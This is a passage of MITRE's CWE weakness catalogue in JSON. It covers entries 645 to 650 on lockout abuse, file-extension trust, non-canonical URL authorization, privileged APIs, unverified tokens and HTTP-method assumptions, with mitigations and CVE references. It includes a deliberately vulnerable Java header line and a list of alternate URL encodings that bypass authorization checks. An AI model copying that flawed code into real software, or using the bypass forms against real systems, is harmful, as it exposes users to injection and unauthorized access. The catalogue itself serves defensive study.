to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addHeader(HEADER_NAME, untrustedRawInputData);"}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-3918","Description":"Web server does not remove the Expect header from an HTTP request when it is reflected back in an error message, allowing a Flash SWF file to perform XSS attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Insufficient Filtering of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2010-04-05"}}]}},"645":{"attr":{"@_ID":"645","@_Name":"Overly Restrictive Account Lockout Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out.","Extended_Description":"Account lockout is a security feature often present in applications as a countermeasure to the brute force attack on the password based authentication mechanism of the system. After a certain number of failed login attempts, the users\' account may be disabled for a certain period of time or until it is unlocked by an administrator. Other security events may also possibly trigger account lockout. However, an attacker may use this very security feature to deny service to legitimate system users. It is therefore important to ensure that the account lockout security mechanism is not overly restrictive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"Users could be locked out of accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Implement more intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name."},{"Phase":"Architecture and Design","Description":"Implement a lockout timeout that grows as the number of incorrect login attempts goes up, eventually resulting in a complete lockout."},{"Phase":"Architecture and Design","Description":"Consider alternatives to account lockout that would still be effective against password brute force attacks, such as presenting the user machine with a puzzle to solve (makes it do some computation)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"2"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Enabling_Factors_for_Exploitation, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"646":{"attr":{"@_ID":"646","@_Name":"Reliance on File Name or Extension of Externally-Supplied File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.","Extended_Description":"An application might use the file name or extension of of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a \\".php.gif\\" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to read sensitive data."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker may be able to cause a denial of service."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to gain privileges."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Make decisions on the server side based on file content and not on file name or extension."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"209"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-13","Modification_Comment":"Significant clarification of the weakness description."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Taking Actions based on File Name or Extension of a User Supplied File","attr":{"@_Date":"2008-10-14"}}}},"647":{"attr":{"@_ID":"647","@_Name":"Use of Non-Canonical URL Paths for Authorization Decisions","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.","Extended_Description":{"xhtml:p":["If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as:","Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule)."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["http://WWW.EXAMPLE.COM/mypage","http://www.example.com/%6Dypage (alternate encoding)","http://192.168.1.1/mypage (IP address)","http://www.example.com/mypage/ (trailing /)","http://www.example.com:80/mypage"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program)."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form."},{"Phase":"Architecture and Design","Description":"Reject all alternate path encodings that are not in the expected canonical form."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Example from CAPEC (CAPEC ID: 4, \\"Using Alternative IP Address Encodings\\"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS02-J","Entry_Name":"Canonicalize path names before validating them"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Using Non-Canonical Paths for Authorization Decisions","attr":{"@_Date":"2008-10-14"}}}},"648":{"attr":{"@_ID":"648","@_Name":"Incorrect Use of Privileged APIs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.","Extended_Description":{"xhtml:p":["When an application contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to:","If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data.","For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["ensure that assumptions made by the APIs are valid, such as validity of arguments","account for known weaknesses in the design/implementation of the API","call the API from a safe context"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker may be able to obtain sensitive information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker may be able to execute code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call."},{"Phase":"Architecture and Design","Description":"Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely."},{"Phase":"Implementation","Description":"If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call."},{"Phase":"Implementation","Description":"If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes."},{"Phase":"Implementation","Description":"Only call privileged APIs from safe, consistent and expected state."},{"Phase":"Implementation","Description":"Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges)."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0645","Description":"A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0645"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"234"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Improper Use of Privileged APIs","attr":{"@_Date":"2009-05-27"}}}},"649":{"attr":{"@_ID":"649","@_Name":"Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the software does not use integrity checks to detect if those inputs have been modified.","Extended_Description":"When an application relies on obfuscation or incorrectly applied / weak encryption to protect client-controllable tokens or parameters, that may have an effect on the user state, system state, or some decision made on the server. Without protecting the tokens/parameters for integrity, the application is vulnerable to an attack where an adversary traverses the space of possible values of the said token/parameter in order to attempt to gain an advantage. The goal of the attacker is to find another admissible value that will somehow elevate their privileges in the system, disclose information or change the behavior of the system in some way beneficial to the attacker. If the application does not protect these critical tokens/parameters for integrity, it will not be able to determine that these values have been tampered with. Measures that are used to protect data for confidentiality should not be relied upon to provide the integrity service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"The inputs could be modified without detection, causing the software to have unexpected system state or make incorrect security decisions."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect important client controllable tokens/parameters for integrity using PKI methods (i.e. digital signatures) or other means, and checks for integrity on the server side."},{"Phase":"Architecture and Design","Description":"Repeated requests from a particular user that include invalid values of tokens/parameters (those that should not be changed manually by users) should result in the user account lockout."},{"Phase":"Architecture and Design","Description":"Client side tokens/parameters should not be such that it would be easy/predictable to guess another valid state."},{"Phase":"Architecture and Design","Description":"Obfuscation should not be relied upon. If encryption is used, it needs to be properly applied (i.e. proven algorithm and implementation, use padding, use random initialization vector, user proper encryption mode). Even with proper encryption where the ciphertext does not leak information about the plaintext or reveal its structure, compromising integrity is possible (although less likely) without the provision of the integrity service."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-0039","Description":"An IPSec configuration does not perform integrity checking of the IPSec packet as the result of either not configuring ESP properly to support the integrity service or using AH improperly. In either case, the security gateway receiving the IPSec packet would not validate the integrity of the packet to ensure that it was not changed. Thus if the packets were intercepted the attacker could undetectably change some of the bits in the packets. The meaningful bit flipping was possible due to the known weaknesses in the CBC encryption mode. Since the attacker knew the structure of the packet, they were able (in one variation of the attack) to use bit flipping to change the destination IP of the packet to the destination machine controlled by the attacker. And so the destination security gateway would decrypt the packet and then forward the plaintext to the machine controlled by the attacker. The attacker could then read the original message. For instance if VPN was used with the vulnerable IPSec configuration the attacker could read the victim\'s e-mail. This vulnerability demonstrates the need to enforce the integrity service properly when critical data could be modified by an attacker. This problem might have also been mitigated by using an encryption mode that is not susceptible to bit flipping attacks, but the preferred mechanism to address this problem still remains message verification for integrity. While this attack focuses on the network layer and requires an entity that controls part of the communication path such as a router, the situation is not much different at the software level, where an attacker can modify tokens/parameters used by the application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0039"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Description, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Relying on Obfuscation or Encryption with no Integrity Checking to Protect User Controllable Parameters that are Used to Determine User or System State","attr":{"@_Date":"2008-04-11"}}}},"650":{"attr":{"@_ID":"650","@_Name":"Trusting HTTP Permission Methods on the Server Side","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state.","Extended_Description":"The HTTP GET method and some other methods are designed to retrieve resources and not to alter the state of the application or resources on the server side. Furthermore, the HTTP specification requires that GET requests (and other requests) should not have side effects. Believing that it will be enough to prevent unintended resource alterations, an application may disallow the HTTP requests to perform DELETE, PUT and POST operations on the resource representation. However, there is nothing in the HTTP protocol itself that actually prevents the HTTP GET method from performing more than just query of the data. Developers can easily code programs that accept a HTTP GET request that do in fact create, update or delete data on the server. For instance, it is a common practice with REST based Web Services to have HTTP GET requests modifying resources on the server side. However, whenever that happens, the access control needs to be properly enforced in the application. No assumptions should be made that only HTTP DELETE, PUT, POST, and other methods have the power to alter the representation of the resource being accessed in the request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could escalate privileges."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify resources."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker could obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Configure ACLs on the server side to ensure that proper level of access control is defined for each accessible resource representation."}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 